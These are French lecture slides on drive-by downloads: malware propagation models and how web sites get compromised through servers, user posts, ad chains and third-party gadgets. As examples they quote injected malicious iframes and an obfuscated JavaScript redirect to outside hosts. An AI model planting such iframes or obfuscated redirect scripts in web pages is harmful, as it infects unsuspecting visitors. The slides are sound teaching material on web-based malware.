Cours #04

Drive-by downloading

Jean-Marc Robert

Génie logiciel et des TI

Jean-Marc Robert, ETS Logiciels malveillants - A112

Plan de présentation

Logiciels malveillants

Amateurs

Professionnels

Propagation: Push model versus Pull model

Nouveau modèle de propagation: Drive-by downloading

Phase I: Compromettre un site web

Phase II: Exploiter une vulnérabilité

Jean-Marc Robert, ETS Logiciels malveillants - A113

Logiciels malveillants: Premières

générations

L’œuvre d’amateurs cherchant à démontrer leurs compétences

techniques.

Publicité, reconnaissance, …

Traditionnellement, l’objectif de ces logiciels malveillants était

de se propager sur le plus de systèmes possible.

Occasionnellement, ces logiciels cherchaient à détruire les systèmes

infectés.

Jean-Marc Robert, ETS Logiciels malveillants - A114

Logiciels malveillants: Nouvelles

générations

L’œuvre de professionnels cherchant à monnayer leurs activités

illicites.

L’objectif de ces nouveaux logiciels malveillants est de compro-

mettre le plus de systèmes possible afin de maximiser les profits

tout en demeurant le plus discret possible.

Se propager le plus efficacement possible.

Jean-Marc Robert, ETS Logiciels malveillants - A115

Propagation: Push model versus Pull model

Push model

Modèle classique

Le logiciel malveillant (ver) cherche

à se propager à travers le réseau

grâce à une vulnérabilité.

P. ex., Slammer

Le ver est proactif.

Points faibles:

Génération aléatoire de fausses

adresses.

Systèmes protégés par des pare-feu ou

des NATs (adresses privées).

Pull model

Nouveau modèle

Le logiciel malveillant attend que le

système vulnérable « vienne » à lui.

Le système vulnérable est proactif.

Points forts:

Permets de passer outre les pare-feu et

les NATs.

Peut demeurer « invisible » lors de

l’infection.

Jean-Marc Robert, ETS Logiciels malveillants - A116

Propagation: Drive-by downloading

La simple navigation sur le web est maintenant devenue une

activité dangereuse.

Simplement en visitant un site web malicieux, un système

vulnérable peut devenir infecté.

Une recherche effectuée au début de 2007 par une équipe de

chercheurs de Google a démontré que sur 4,5 millions d’URL

ayant été analysées

450,000 URL ont cherché à installer un logiciel malveillant à travers le

fureteur;

700,000 URL ont eu un comportement douteux (non confirmé).

Jean-Marc Robert, ETS Logiciels malveillants - A117

Drive-by downloading – deux préalables

Un site web malicieux distribuant des logiciels malveillants

Simplement en le visitant (pull model)

Un fureteur vulnérable

Jean-Marc Robert, ETS Logiciels malveillants - A118

I – un site web malicieux

Développer un site web malicieux.

Malheureusement, comment attirer les visiteurs.

Compromettre un site existant.

Profiter d’un grand nombre de visiteurs.

Jean-Marc Robert, ETS Logiciels malveillants - A119

Compromettre un site web

Le contenu d’un site web est généralement développé par son

propriétaire.

Cependant, il existe des exceptions notoires:

Publicité provenant de tiers

Information provenant des usagers (p.ex. blogue, forum, …)

Gadgets informatiques (p.ex. compteurs, calendriers, …)

Jean-Marc Robert, ETS Logiciels malveillants - A1110

Compromettre un site web: I – Serveur

Un serveur web est aussi sûr que son application la plus

vulnérable! (maillon le plus faible)

Applications administratives

ssh (attaque massive d’un mot de passe)

Serveur http

Applications (utilisant des langages de script)

Bases de données

Il « suffit » de trouver une vulnérabilité permettant d’accéder

au serveur avec les privilèges de l’administrateur.

Jean-Marc Robert, ETS Logiciels malveillants - A1111

Compromettre un site web: I – Serveur

Une fois que le serveur est compromis, le tour est joué!

Un exemple parmi des milliers possibles:<!-- Copyright Information -->

<div align=’center’ class=’copyright’>Powered by

<a href="http://www.invisionboard.com">Invision PowerBoard</a>

(U)v1.3.1 Final &copy; 2003 &nbsp;

<a href=’http://www.invisionpower.com’>IPS, Inc.</a></div>

<iframe src=’http://wsfgfdgrty.net/adv/193/new.php’></iframe>

<iframe src=’http://wsfgfdgrty.net/adv/new.php?adv=193’></iframe>

Chaque iframe ayant été ajouté exploite une vulnérabilité donnée.

Lors du test, 50 binaires malicieux ont infecté le système!

Jean-Marc Robert, ETS Logiciels malveillants - A1112

Compromettre un site web: II – Usagers

Information provenant des usagers (p.ex. blogue, forum, …)

Seulement un sous-ensemble HTML devrait être accepté.

Malheureusement, dû à une mauvaise vérification certains usagers peuvent inclure du code malicieux HTML. Iframe, script, …

Un exemple parmi des milliers possibles:<SCRIPT language=JavaScript>

Function tqzyu(nemz)juyu="lo";sdfwe78="catio";jj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="(’"; awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";olkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re"; jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="’)";if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//

</SCRIPT>

location.replace (’’http:/ /videozfree.com’’)"

Jean-Marc Robert, ETS Logiciels malveillants - A1113

Compromettre un site web: III – Publicité

Publicités contrôlées

par des tiers!

Jean-Marc Robert, ETS Logiciels malveillants - A1114

Compromettre un site web: III – Publicité

Web

Fournisseur

publicitaire

Fournisseur

publicitaire

Fournisseur

publicitaire

Javascript

Pouvons-nous faire confiance à un sous-traitant du sous-traitant?

Jean-Marc Robert, ETS Logiciels malveillants - A1115

Compromettre un site web: III – Publicité

Un site de partage vidéo (décembre 2006)

La page web contenait une bannière publicitaire d’une grande

compagnie publicitaire américaine – un premier module Javascript.

Ce premier module générait un deuxième module JavaScript pour

accéder à une autre grande compagnie publicitaire américaine

(2ième).

Ce deuxième module générait un troisième module Javascript pour

accéder à une petite compagnie américaine (3ième) fournissant des

annonces publicitaires en fonction de la région où se retrouve l’usager.

Cette publicité régionale contenait un iframe dans sa page HTML

pointant vers une compagnie publicitaire russe (4ième).

En interprétant cet iframe, le fureteur était redirigé vers une page

(xx.xx.xx.xx/aeijs/) contenant un module Javascript chiffré essayant

d’exploiter de nombreuses vulnérabilités du fureteur afin d’installer

des logiciels malveillants.

Jean-Marc Robert, ETS Logiciels malveillants - A1116

Compromettre un site web: IV – Gadgets

Un gadget informatique est un lien vers un module Javascript

ou un iframe fournissant une fonctionnalité particulière.

Compteur

Calendrier

…

Malheureusement, ces gadgets sont fournis régulièrement par

des entités externes.

Jean-Marc Robert, ETS Logiciels malveillants - A1117

Compromettre un site web: IV – Gadgets

<!-- Begin Stat Basic code -->

<script language="JavaScript"

src="http://m1.stat.xx/basic.js">

</script><script language="JavaScript">

<!--

statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);

// -->

</script> <noscript>

<a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA">

<img src="http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA"

border="0" nosave width="18" height="18"></a></noscript>

<!-- End Stat Basic code -->

Ce gadget devait conserver les statistiques sur le nombre de

visiteurs depuis 2002. Malheureusement, ce gadget est une

source d’infection depuis 2006.

Jean-Marc Robert, ETS Logiciels malveillants - A1118

Compromettre un site web: IV – Gadgets

Un exemple intéressant: iframemoney.org.

Cette “entreprise” paie les webmestres pour qu'ils incluent un

iframe malicieux dans leurs pages web.

En juin 2007, iframemoney.org était en activité depuis octobre

2006 et offrait $7 pour chaque tranche de 10,000 nouveaux

visiteurs.

Jean-Marc Robert, ETS Logiciels malveillants - A1119

Références

N. Provos, D. McNamee, P. Mavrommatis, K. Wang et N. Modadugu,

The Ghost In The Browser Analysis of Web-based Malware, Usenix

Hotbots 2007.